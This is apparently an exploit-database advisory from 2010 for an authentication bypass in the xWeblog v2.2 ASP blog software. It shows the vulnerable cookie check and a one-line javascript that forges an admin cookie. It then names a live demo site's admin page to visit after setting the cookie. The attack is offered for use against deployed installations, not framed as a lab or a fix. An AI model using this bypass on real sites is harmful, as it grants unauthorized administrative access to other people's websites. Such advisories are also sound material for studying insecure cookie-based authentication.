1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit Database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I'm ZoRLu member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Title : xWeblog v2.2 Insecure Cookie Handling Vulnerability # Script Down. : http://www.aspdunyasi.com/goster.asp?id=19 # Demo : http://siirdensiire.com/ # Tested : Windows XP Professional sp3 # Author : ZoRLu / http://inj3ct0r.com/author/577 # mail-msn : admin@yildirimordulari.com # Home : http://z0rlu.blogspot.com # Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org # Date : 08/10/2010 # Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N # Lakirdi : Gecmiyorum Zaman a.k :/ # Lakirdi : off ulan off / http://www.videokeyfim.net/duruyenin-gugumleri-keklik-gibi-kanadimi-suzmedim-murat-ali-doya-doya-gezmedim-bu-kara-yaziyi-kendim-yazmadim.html Cookie Exp: javascript:document.cookie = "Yonetim=kullanici_adi=admin; path=/"; after you go here : http://siirdensiire.com/makale_ekle.asp Vuln File: inc_yonetim_cookie.asp Vuln Code: <% if not Request.Cookies("Yonetim")("kullanici_adi")="admin" then Response.Redirect "default.asp" else %> Desc: if I create our cookie like this, maybe we can be login. oh ok I will create our cookie javascript:document.cookie = "Yonetim=kullanici_adi=admin; path=/"; and I look I done login so its successful